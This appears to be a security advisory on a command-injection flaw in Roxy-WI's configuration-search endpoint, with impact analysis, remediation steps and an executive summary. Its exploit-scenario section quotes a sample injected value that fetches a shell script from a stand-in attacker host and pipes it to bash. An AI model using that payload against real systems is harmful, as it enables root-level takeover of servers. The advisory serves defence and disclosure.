| Exploitation Conditions | Attacker must possess valid authenticated credentials to the Roxy-WI web interface (PR:L in CVSS vector indicates low-privileged user access is sufficient, not requiring administrative Roxy-WI permissions). The vulnerable /config/<service>/find-in-config endpoint must be accessible to authenticated users, which is the default configuration for normal operational use of the search feature. The Roxy-WI instance must have active SSH connectivity configured to at least one managed server (Haproxy, Nginx, Apache, or Keepalived) for the command injection to reach a target system. No user interaction is required (UI:N) and attack complexity is low (AC:L) as the injection point is a straightforward API endpoint without additional protections. Exploitation is NOT limited by network segmentation since managed servers are intentionally SSH-accessible from the Roxy-WI host, nor by special application features since configuration search is core functionality. |
| Impact | This represents a high-priority vulnerability requiring immediate remediation for Roxy-WI deployments. The CVSS 4.0 vector (AV:N/AC:L/PR:L) indicates network-accessible exploitation with low attack complexity requiring only low-privileged authentication, while the impact metrics (VC:H/VI:H/VA:H) show complete confidentiality, integrity, and availability compromise of the targeted managed server. The existence of a proof-of-concept (E:P in CVSS vector) significantly lowers the barrier to exploitation. However, the real-world risk is somewhat bounded by two factors: attackers need valid Roxy-WI credentials (PR:L) to reach the vulnerable endpoint, and the scope is unchanged (SC:N/SI:N/SA:N) meaning initial compromise is limited to managed servers accessible via the Roxy-WI instance rather than the web application itself. Organizations using Roxy-WI to manage critical infrastructure (load balancers, web servers) face elevated risk as compromise of these systems could enable lateral movement, service disruption, or data exfiltration. The combination of sudo-level execution and management of network-facing services makes this a realistic pathway for infrastructure compromise despite the authentication requirement. |
| Exploit ScenarioDerived | An attacker with valid low-privilege Roxy-WI credentials accesses the web interface and crafts a malicious HTTP request to /config/nginx/find-in-config with a 'words' parameter containing shell metacharacters like '; whoami; curl attacker.com/shell.sh | bash;'. The vulnerable endpoint fails to sanitize this input and constructs a grep command executed via SSH on a managed Nginx server with sudo privileges. The injected commands break out of the grep context, establishing a reverse shell to the attacker's infrastructure with root-level access to the managed server, enabling data theft, service manipulation, or use as a pivot point for further network compromise. |

Alert meAnalysisAIv1 – Apr 24, 2026
Command injection in Roxy-WI versions prior to 8.2.6.4 enables authenticated attackers to execute arbitrary OS commands with sudo privileges on managed servers. The vulnerability stems from unsanitized input in the /config/<service>/find-in-config endpoint that breaks out of grep command context during remote SSH execution. A proof-of-concept exploit exists (CVSS E:P), and the CVSS 4.0 score of 7.4 reflects network-based attack with low complexity requiring only low-privilege authentication. Vendor-released patch 8.2.6.4 available via GitHub commit 02f147d.
RemediationAI
Upgrade immediately to Roxy-WI version 8.2.6.4 or later, which contains input sanitization fixes per GitHub commit 02f147d567a3cc8cf61a4b58ea4c2b7866a544de available at https://github.com/roxy-wi/roxy-wi/commit/02f147d567a3cc8cf61a4b58ea4c2b7866a544de. If immediate patching is not feasible, implement these compensating controls: Restrict network access to the Roxy-WI management interface to trusted administrator IP addresses only via firewall rules or reverse proxy ACLs (trade-off: reduces operational flexibility for remote administration). Audit and minimize Roxy-WI user accounts, removing low-privilege users and enforcing strong authentication (trade-off: may impact team workflows requiring delegated access). Monitor SSH logs on managed servers for unexpected command patterns or privilege escalation attempts originating from Roxy-WI's SSH keys (trade-off: detection-only, does not prevent exploitation). Consider temporarily disabling the configuration search feature if not operationally critical until patching is complete (trade-off: loss of search functionality).

Technical ContextAI · show details
Roxy-WI is a web-based management interface for Haproxy, Nginx, Apache, and Keepalived servers that executes administrative commands on remote managed servers via SSH. The vulnerability affects the configuration search functionality where the 'words' parameter is passed unsanitized into a shell command string containing grep. This constitutes a classic CWE-78 OS Command Injection flaw where shell metacharacters (such as semicolons, pipes, backticks, or command substitution syntax) can terminate the intended grep command and inject arbitrary commands. The commands execute with sudo privileges in the context of the SSH session on the target managed server, not just the Roxy-WI web application host. The CPE identifier cpe:2.3:a:roxy-wi:roxy-wi indicates all versions prior to the patched release are affected.

Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. Prior to version 8.2.6.4, the /config/ < service > /find-in-config endpoint in Roxy-WI fails to sanitize the user-supplied words parameter before embedding it into a shell command string that is subsequently executed on a remote managed server via SSH. An authenticated attacker can inject arbitrary shell metacharacters to break out of the intended grep command context and execute arbitrary OS commands with sudo privileges on the target server, resulting in full Remote Code Execution (RCE). Version 8.2.6.4 patches the issue.
Executive ViewAI
Roxy-WI versions before 8.2.6.4 contain a command injection vulnerability allowing authenticated users to execute arbitrary commands with elevated privileges on managed infrastructure servers, potentially compromising operational control and data integrity across all connected systems. This affects organizations using Roxy-WI for server configuration management, particularly those with low-privileged user accounts or shared access models.
Apply vendor patch 8.2.6.4. If patching is delayed: restrict network access to the /config/<service>/find-in-config endpoint to trusted administrative IP ranges; disable or revoke low-privilege user access to Roxy-WI until patched; implement enhanced logging and monitoring for SSH command execution on managed servers.
